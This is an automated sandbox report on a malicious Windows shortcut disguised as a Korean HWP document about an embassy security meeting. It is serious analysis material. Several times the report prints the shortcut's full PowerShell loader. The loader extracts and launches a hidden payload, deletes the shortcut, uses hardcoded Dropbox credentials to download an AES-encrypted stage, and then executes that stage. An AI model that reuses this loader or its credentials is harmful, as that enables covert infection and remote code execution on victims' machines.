Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 21, 2024, 2:23 p.m.	Aug. 21, 2024, 2:26 p.m.

Size	1.1MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`a4bd6d00abbd79ab00161ff538cfe703`
SHA256	`fe156159a26f8b7c140db61dd8b136e1c8103a800748fe9b70a3a3fdf179d3c3`
CRC32	`13D93C04`
ssdeep	`1536:LCNrr8wc73ExbcrIoHXnTKZva0CfkTYcIJex+155sB:LCNrr8wc73ExbcrIUnTKUfkiH54`
Yara	HWP_file_format - HWP Document File Microsoft_Office_File_Zero - Microsoft Office File lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "puWJNPHefC" "C:\Users\test22\AppData\Local\Temp\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp.lnk"
2548
- cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
  2660
  - powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
    2764
    - Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\202404_주중한국대사관 한중 북중·안보현안 1.5트랙 비공개 정책간담회 대면회의 계획(안).hwp"
      2860
      - HimTrayIcon.exe "C:\Program Files (x86)\Hnc\Common80\HimTrayIcon.exe"
        2976
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
content.dropboxapi.com	CNAME edge-block-api-env.dropbox-dns.com A 162.125.80.14	162.125.80.14

IP Address	Status	Action
162.125.80.14	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49168 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49168 -> 162.125.80.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49167 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49167 -> 162.125.80.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49167 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49168 -> 162.125.80.14:443	2030702	ET POLICY [401TRG] DropBox Access via API (SNI)	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 21, 2024, 2:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 21, 2024, 2:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 21, 2024, 2:24 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 21, 2024, 2:23 p.m.			0	0
IsDebuggerPresent Aug. 21, 2024, 2:23 p.m.			0	0
IsDebuggerPresent Aug. 21, 2024, 2:24 p.m.			0	0

Command line console output was observed (50 out of 240 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: readfileend console_handle: 0x0000001f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: exestart console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: exeend console_handle: 0x0000001f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x00000033	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000003f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000004b	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: At line:1 char:2157 console_handle: 0x00000057	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: + $tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;fo console_handle: 0x00000063	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: reach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path console_handle: 0x0000006f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Obje console_handle: 0x0000007b	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ct System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]:: console_handle: 0x00000087	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file console_handle: 0x00000093	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ,0,$file.Length);$InputStream.Dispose();write-host "readfileend";$path = $lnkpa console_handle: 0x0000009f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: th.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\ console_handle: 0x000000ab	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1 console_handle: 0x000000b7	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: 110496;$temp = New-Object Byte[]($len2-$len1);write-host "exestart";for($i=$len console_handle: 0x000000c3	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: 1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) console_handle: 0x000000cf	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: -Encoding Byte;write-host "exeend";$temp = New-Object Byte[]($file.Length-$len3 console_handle: 0x000000db	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: );for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $enc console_handle: 0x000000e7	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: Data_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Fun console_handle: 0x000000f3	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ction AESDecrypt { param ( [Byte[]]$bytes,[String]$pass="pa55w0rd") $InputStrea console_handle: 0x000000ff	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: m = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object Syste console_handle: 0x0000010b	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: m.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read( console_handle: 0x00000117	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: $Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = N console_handle: 0x00000123	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ew-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey console_handle: 0x0000012f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Securit console_handle: 0x0000013b	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: y.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoS console_handle: 0x00000147	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: tream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec console_handle: 0x00000153	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: , [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($ console_handle: 0x0000015f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientI console_handle: 0x0000016b	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: D = "oj8kd1lzqrw7v3m";$clientSecret = "vwp27gytekx9jfq";$refreshToken = "wR3_UL console_handle: 0x00000177	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: k2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u";$body = @{grant_typ console_handle: 0x00000183	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: e="refresh_token";refresh_token=$refreshToken;client_id=$clientID;client_secret console_handle: 0x0000018f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: =$clientSecret};$tokenEndpoint = "https://api.dropboxapi.com/oauth2/token";$res console_handle: 0x0000019b	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ponse = Invoke-RestMethod <<<< -Uri $tokenEndpoint -Method Post -Body $body;if console_handle: 0x000001a7	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl console_handle: 0x000001b3	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: = "https://content.dropboxapi.com/2/files/download";$remoteFilePath = "/step5/p console_handle: 0x000001bf	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: s.bin";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Me console_handle: 0x000001cb	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: thod = "POST";$request.Headers.Add("Authorization", "Bearer $accessToken");$req console_handle: 0x000001d7	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: uest.Headers.Add("Dropbox-API-Arg", '{"path": "' + $remoteFilePath + '"}');$res console_handle: 0x000001e3	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ponse = $request.GetResponse();$receiveStream = $response.GetResponseStream();$ console_handle: 0x000001ef	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: pass = "pa55w0rd";if ($receiveStream -ne $null) {$streamReader = New-Object Sys console_handle: 0x000001fb	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: tem.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.Memory console_handle: 0x00000207	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: Stream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.R console_handle: 0x00000213	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ead($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while console_handle: 0x0000021f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -byt console_handle: 0x0000022b	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: es $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($ console_handle: 0x00000237	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiv console_handle: 0x00000243	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: eStream.Close();$response.Close(); console_handle: 0x0000024f	1	1
WriteConsoleW Aug. 21, 2024, 2:23 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x0000025b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1910 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1910 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1910 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a17d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 21, 2024, 2:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004a1dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 21, 2024, 2:23 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 173 events)

Time & API	Arguments	Status
